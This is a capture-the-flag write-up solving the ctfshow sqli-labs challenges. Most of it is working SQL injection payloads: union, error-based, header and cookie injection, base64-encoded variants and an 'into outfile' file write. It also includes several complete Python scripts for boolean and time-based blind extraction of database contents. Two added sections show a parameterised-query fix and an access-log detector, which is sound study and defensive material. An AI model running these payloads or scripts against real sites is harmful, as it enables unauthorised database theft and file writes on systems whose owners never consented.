The biggest difference between ctfshow's sqli-labs and a local setup is that on ctfshow the flag is not in the current `security` database but in a separate database, `ctfshow`. I had never known how to query across databases before, so I went and learned it on the spot.
In a union query we use `information_schema`. Besides `tables` and `columns`, this database has a table called `schemata` that stores the names of every database on the server; in `schemata`, the column `schema_name` holds those database names.
payload (dump the database names first, then the table names, the column names and finally the flag column):

```
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata-- -
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- -
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'-- -
?id=-1' union select 1,group_concat(flag),3 from ctfshow.flag-- -
```
The second challenge differs from the first only in that the first is closed with `'` while the second is numeric, so just drop the closing single quote.
payload:

```
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata-- -
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- -
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagaa'-- -
?id=-1 union select 1,group_concat(flagac),3 from ctfshow.flagaa-- -
```
Closed with `')`.

Closed with `")`.

Closed with `'`.
The biggest difference between this challenge and the previous four is that when you enter data that exists in the database it only echoes `You are in.....`, and when you enter data that does not exist there is no output at all. This is clearly boolean-based blind injection, and you can write your own script to get the flag quickly.
```python
import requests

if __name__ == '__main__':
    # Injection point: id=1' and <condition>#  (the %23 at the end of each payload is the '#')
    url = 'http://d1e86be0-6e2a-42b1-9fc6-f2382b36311a.challenge.ctf.show:8080?id=1%27and%20'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagpuck"),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(flag33) from ctfshow.flagpuck),{i},1))>{mid},1,0)%23'
            # print(payload)
            r = requests.get(url=url + payload)
            if 'You are in...........' in r.text:  # condition true: character > mid
                low = mid + 1
            else:  # condition false: character <= mid
                high = mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string: ascii('') is 0, so every comparison is false (a literal space would also stop here)
    print(result)
```
Binary search is a good choice here. In the payload, `substr()` extracts one character at a time and `ascii()` converts it to its ASCII code; if `you are in....` appears, that character's ASCII value is greater than the midpoint of `low` and `high`, so `low` becomes `mid+1`; if it does not appear, the value is not greater than the midpoint, and `mid` is assigned to `high`.
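As an added example (not code from the writeup), the two behaviours above, the union enumeration of `information_schema` and the boolean oracle, reproduced against a constructed in-memory SQLite table, with the vulnerable string-built query beside the parameterised one that removes both. `sqlite_master` stands in for `information_schema`, and the table layout is an assumption.

```python
import sqlite3

# Constructed stand-in for the challenge database (assumption: the real layout is not on the page).
# In SQLite, sqlite_master plays the role information_schema plays in MySQL.
def make_db():
    conn = sqlite3.connect(':memory:')
    conn.execute('create table users(id integer, username text, password text)')
    conn.executemany('insert into users values(?, ?, ?)',
                     [(1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you')])
    return conn

def vulnerable_lookup(conn, user_id):
    """Less-1 style: the id parameter is pasted straight into a single-quoted literal."""
    sql = f"select id, username, password from users where id='{user_id}' limit 0,1"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, user_id):
    """Same query with a bound parameter: the quote and everything after it is data, not SQL."""
    sql = "select id, username, password from users where id=? limit 0,1"
    return conn.execute(sql, (user_id,)).fetchall()

# Union enumeration, the SQLite analogue of the information_schema.schemata payload.
UNION_PAYLOAD = "-1' union select 1,group_concat(name),3 from sqlite_master-- -"
# Boolean oracle: the row (the page's 'You are in') comes back only when the guessed character is right.
TRUE_PAYLOAD = "1' and substr((select group_concat(name) from sqlite_master),1,1)='u'-- -"
FALSE_PAYLOAD = "1' and substr((select group_concat(name) from sqlite_master),1,1)='z'-- -"

def demo():
    """Run every payload through both lookups and return the rows each one produced."""
    conn = make_db()
    return {
        'vuln_union': vulnerable_lookup(conn, UNION_PAYLOAD),   # attacker-chosen row: table names leak
        'vuln_true': vulnerable_lookup(conn, TRUE_PAYLOAD),     # row returned: oracle says 'u' is right
        'vuln_false': vulnerable_lookup(conn, FALSE_PAYLOAD),   # empty: oracle says 'z' is wrong
        'safe_union': safe_lookup(conn, UNION_PAYLOAD),         # empty: no id equals that whole string
        'safe_true': safe_lookup(conn, TRUE_PAYLOAD),           # empty either way: no oracle left
        'safe_false': safe_lookup(conn, FALSE_PAYLOAD),
    }

if __name__ == '__main__':
    for name, rows in demo().items():
        print(f'{name}: {rows}')
```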
"
闭合
```python
import requests

if __name__ == '__main__':
    # Injection point: id=1" and <condition>#
    url = 'http://28c313d6-1841-4035-adab-c84443e19961.challenge.ctf.show:8080/?id=1%22and%20'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagpa"),{i},1))>{mid},1,0)%23'
            payload = f'if(ascii(substr((select group_concat(flag3a3) from ctfshow.flagpa),{i},1))>{mid},1,0)%23'
            # print(payload)
            r = requests.get(url=url + payload)
            if 'You are in...........' in r.text:  # condition true: character > mid
                low = mid + 1
            else:
                high = mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
Closed with `'))`.
The hint for this challenge is to write a file. At first I thought of writing a webshell, but the flag is in the database, so that approach does not work; later I realised I could write the database name, table names and so on into a file and then browse to it.
payload:

```
?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' into outfile "/var/www/html/1.txt"-- -
?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagdk' into outfile "/var/www/html/2.txt"-- -
?id=1')) union select 1,2,group_concat(flag43) from ctfshow.flagdk into outfile "/var/www/html/3.txt"-- -
```
```python
import requests

if __name__ == '__main__':
    # Injection point: id=1' and <condition>#
    url = 'http://c72dc775-84d8-47c9-ac8b-de8ef204158e.challenge.ctf.show:8080/?id=1%27and%20'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagjugg"),{i},1))>{mid},1,0)%23'
            payload = f'if(ascii(substr((select group_concat(flag423) from ctfshow.flagjugg),{i},1))>{mid},1,0)%23'
            # print(payload)
            r = requests.get(url=url + payload)
            if 'You are in...........' in r.text:  # condition true: character > mid
                low = mid + 1
            else:
                high = mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
In this challenge the page shows `you are in....` whatever you enter, so time-based blind injection can be used via the `sleep()` function: if the condition is true the server sleeps for a few seconds, if it is false the page loads immediately. A script can be written for this as well.
Closed with `'`.
```python
import requests

if __name__ == '__main__':
    # Injection point: id=1' and <condition>#
    url = 'http://8fe3d6cd-1e9a-4466-a20d-4588602016c7.challenge.ctf.show:8080/?id=1%27and%20'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.1),0)%23'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.1),0)%23'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagug"),{i},1))>{mid},sleep(0.1),0)%23'
            payload = f'if(ascii(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1))>{mid},sleep(0.2),0)%23'
            # print(payload)
            try:
                # A reply must arrive within 0.15 s, then the next statement runs; if the server is still
                # inside sleep(0.2) after 0.15 s the timeout fires and the except branch runs instead
                r = requests.get(url=url + payload, timeout=0.15)
                high = mid  # answered quickly: condition false, character <= mid
            except requests.exceptions.Timeout:
                low = mid + 1  # timed out: condition true, character > mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
The script uses `try....except` exception handling: a result must come back within 0.15 s, in which case the following statement runs; if there is still no result after 0.15 s, the `except` block runs instead.
"
闭合
```python
import requests

if __name__ == '__main__':
    # Injection point: id=1" and <condition>#
    url = 'http://f01b14ad-1ed5-4eff-aa62-b5c6fedf01ec.challenge.ctf.show:8080/?id=1%22and%20'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.2),0)%23'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.2),0)%23'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagugs"),{i},1))>{mid},sleep(0.2),0)%23'
            payload = f'if(ascii(substr((select group_concat(flag43s) from ctfshow.flagugs),{i},1))>{mid},sleep(0.2),0)%23'
            try:
                # A reply must arrive within 0.15 s; if the server is still inside sleep(0.2)
                # the timeout fires and the except branch runs instead
                r = requests.get(url=url + payload, timeout=0.15)
                high = mid  # answered quickly: condition false, character <= mid
            except requests.exceptions.Timeout:
                low = mid + 1  # timed out: condition true, character > mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
This challenge is POST injection in the username field of the login form.

payload:

```
uname=aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow'#&passwd=1
uname=aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'#&passwd=1
uname=aadmin' union select 1,group_concat(flag43s) from ctfshow.flagugsd#&passwd=1
```
")
闭合
')
闭合
这题没有回显,但是如果注入成功,会有一个flag.jpg
的图片,注入失败,会有slap.jpg
的图片,可以利用这个来进行布尔盲注
```python
import requests

if __name__ == '__main__':
    url = 'http://9301abaf-d8ee-4cc9-a060-6aad4a35035b.challenge.ctf.show:8080'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flag"),{i},1))>{mid},1,0)'
            payload = f'if(ascii(substr((select group_concat(flag4) from ctfshow.flag),{i},1))>{mid},1,0)'
            # print(payload)
            data = {
                'uname': f"admin') and {payload}#",  # the condition is injected into the username field
                'passwd': '123'
            }
            # print(data['uname'])
            r = requests.post(url=url, data=data)
            if 'flag.jpg' in r.text:  # flag.jpg: condition true, character > mid; slap.jpg otherwise
                low = mid + 1
            else:
                high = mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
"
闭合
```python
import requests

if __name__ == '__main__':
    url = 'http://240d4931-ff0b-405b-a741-91f392e537cd.challenge.ctf.show:8080/'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagb"),{i},1))>{mid},1,0)'
            payload = f'if(ascii(substr((select group_concat(flag4s) from ctfshow.flagb),{i},1))>{mid},1,0)'
            # print(payload)
            data = {
                'uname': f'admin" and {payload}#',  # the condition is injected into the username field
                'passwd': '123'
            }
            # print(data['uname'])
            r = requests.post(url=url, data=data)
            if 'flag.jpg' in r.text:  # flag.jpg: condition true, character > mid; slap.jpg otherwise
                low = mid + 1
            else:
                high = mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
Error messages are turned off here; I found by hand that it closes with `'`.
```python
import requests

if __name__ == '__main__':
    url = 'http://a70f0c66-19e8-497f-87d7-fdcf275647fa.challenge.ctf.show:8080/'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagba"),{i},1))>{mid},1,0)'
            payload = f'if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagba),{i},1))>{mid},1,0)'
            # print(payload)
            data = {
                'uname': f"admin' and {payload}#",  # the condition is injected into the username field
                'passwd': '123'
            }
            # print(data['uname'])
            r = requests.post(url=url, data=data)
            if 'flag.jpg' in r.text:  # flag.jpg: condition true, character > mid; slap.jpg otherwise
                low = mid + 1
            else:
                high = mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
This challenge is time-based blind injection, because whether or not the input is correct the image below is the fail image; using the `sleep()` function I found by hand that it closes with `")`.
```python
import requests

if __name__ == '__main__':
    url = 'http://59b43bf0-9578-454a-a79c-dc89b97ca7ae.challenge.ctf.show:8080/'
    result = ''
    i = 0
    while True:
        i = i + 1  # position of the character being recovered
        low = 32
        high = 127
        while low < high:  # binary search over printable ASCII
            mid = (low + high) // 2
            # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.2),0)'
            # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.2),0)'
            # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagbab"),{i},1))>{mid},sleep(0.2),0)'
            payload = f'if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagbab),{i},1))>{mid},sleep(1),0)'
            # print(payload)
            data = {
                'uname': f'admin") and {payload}#',  # the condition is injected into the username field
                'passwd': '123'
            }
            # print(data['uname'])
            try:
                # A reply must arrive within 0.5 s; if the server is inside sleep(1) the timeout fires
                r = requests.post(url=url, data=data, timeout=0.5)
                high = mid  # answered quickly: condition false, character <= mid
            except requests.exceptions.Timeout:
                low = mid + 1  # timed out: condition true, character > mid
        if low != 32:
            result += chr(low)
        else:
            break  # past the end of the string
    print(result)
```
It seems only error-based injection is left.

```
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)-- -
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name='flag'),0x7e),1)-- -
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select (flag4) from ctfshow.flag),0x7e),1)-- -
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e),1)-- -
```
The page shows an IP address, and after the login request is submitted the User-Agent header is displayed, so this is very likely User-Agent injection; just modify the `User-Agent` header.

payload:

```
' and updatexml(1,concat(0x7e,(select(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select(column_name) from information_schema.columns where table_name='flag' limit 1,1),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select(flag4) from ctfshow.flag),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select right (flag4,20) from ctfshow.flag),0x7e),1) and '1'='1
```
After the POST request is submitted a Referer header appears, which shows this challenge is Referer injection.

Closed with `'`.

payload:

```
' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),0x7e)) and '1'='1
' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag"),0x7e)) and '1'='1
' and extractvalue(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag),0x7e)) and '1'='1
' and extractvalue(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e)) and '1'='1
```
Cookie injection.

Closed with `'`.

payload:

```
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e))-- -
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))-- -
uname=admin' and extractvalue(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e))-- -
```
Builds on the previous challenge with base64 encoding added on top.

Closed with `')`.

payload:

```
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nY3Rmc2hvdycpLDB4N2UpKS0tIC0N
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0nZmxhZycpLDB4N2UpKS0tIC0N
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZzQpIGZyb20gY3Rmc2hvdy5mbGFnKSwweDdlKSktLSAtDQ==
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCByaWdodChmbGFnNCwyMCkgZnJvbSBjdGZzaG93LmZsYWcpLDB4N2UpKS0tIC0N
```
"
闭合
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdjdGZzaG93JyksMHg3ZSkpLS0gLQ==
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdmbGFnJyksMHg3ZSkpLS0gLQ==
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHJpZ2h0KGZsYWc0LDIwKSBmcm9tIGN0ZnNob3cuZmxhZyksMHg3ZSkpLS0gLQ==
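As an added example that is not part of the writeup, a small access-log scanner for the techniques covered above: the union/`information_schema` and `into outfile` payloads, the `sleep()` time-based payloads, the `updatexml()`/`extractvalue()` error-based payloads sent in the User-Agent, Referer and Cookie headers, and the base64-encoded cookie of the last two challenges. The combined-log layout, the marker list and the sample lines are constructed assumptions, not real traffic.

```python
import base64
import re
from urllib.parse import unquote, unquote_plus

# Substrings characteristic of the techniques in this writeup, matched after normalisation.
SQLI_MARKERS = ('union select', 'information_schema', 'into outfile',
                'sleep(', 'updatexml(', 'extractvalue(')
# Combined-log layout assumed here: request line, status, size, referer, user-agent, cookie.
LOG_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" \d+ \d+ '
                    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)" "(?P<cookie>[^"]*)"')

def normalise(value):
    """Percent-decode, collapse whitespace and lowercase so UNION%20SELECT matches 'union select'."""
    return re.sub(r'\s+', ' ', unquote_plus(value)).lower()

def decode_base64(value):
    """Decode a base64 cookie value (the Less-21/22 encoding); return '' if it is not base64."""
    try:
        return base64.b64decode(value, validate=True).decode('utf-8', errors='ignore')
    except ValueError:
        return ''

def scan_line(line):
    """Return (field, marker) pairs found in one log line; headers are checked, not just the URI."""
    m = LOG_RE.search(line)
    if not m:
        return []
    hits = []
    for field in ('uri', 'referer', 'agent', 'cookie'):
        texts = [normalise(m.group(field))]
        if field == 'cookie':  # also inspect each cookie value after base64 decoding
            for part in m.group(field).split(';'):
                texts.append(normalise(decode_base64(unquote(part.partition('=')[2].strip()))))
        hits += [(field, mk) for text in texts for mk in SQLI_MARKERS if mk in text]
    return hits

def scan_log(lines):
    """Map line index -> hits for every line that triggered at least one marker."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}

# Constructed sample lines (not real traffic); the cookie payload is base64-encoded here so it is exact.
_COOKIE = base64.b64encode(b"admin') and extractvalue(1,concat(0x7e,(select 1),0x7e))-- -").decode()
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-9/?id=1%27and%20if(1=1,sleep(0.2),0)%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /Less-18/ HTTP/1.1" 200 512 "-" "\' and updatexml(1,concat(0x7e,(select 1),0x7e),1) and \'1\'=\'1" "-"',
    f'10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "POST /Less-21/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" "uname={_COOKIE}"',
]
```

Form-body injections (the POST challenges) do not appear in an access log at all, so this scanner only sees the URI and header variants; body inspection needs a WAF or application-level logging.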
For this challenge I first tried `?id=1'` and got a syntax error, while `?id=1''` gave output. At first I thought it closed with `"`, but later realised that was wrong and that there were two `'` to close; `?id=1' and 1='1` gave output and `?id=1' and 1='0` gave none, which confirmed the analysis.

```
?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'3
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),'3
?id=-1' union select 1,(select group_concat(flag4) from ctfshow.flag),'3
```